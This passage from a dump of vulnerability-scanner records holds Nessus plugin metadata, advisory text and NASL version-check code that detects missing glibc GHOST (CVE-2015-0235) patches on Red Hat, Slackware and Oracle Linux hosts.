reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:24", "description": "New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0, and 14.1 to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:glibc", "p-cpe:/a:slackware:slackware_linux:glibc-i18n", "p-cpe:/a:slackware:slackware_linux:glibc-profile", "p-cpe:/a:slackware:slackware_linux:glibc-solibs", "p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-028-01.NASL", "href": "https://www.tenable.com/plugins/nessus/81075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-028-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81075);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"SSA\", value:\"2015-028-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, and 14.1 to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.1260924\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ccc24009\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:11", "description": "From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-profile", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nptl-devel", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/81099", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0101 and \n# Oracle Linux Security Advisory ELSA-2015-0101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81099);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004827.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", 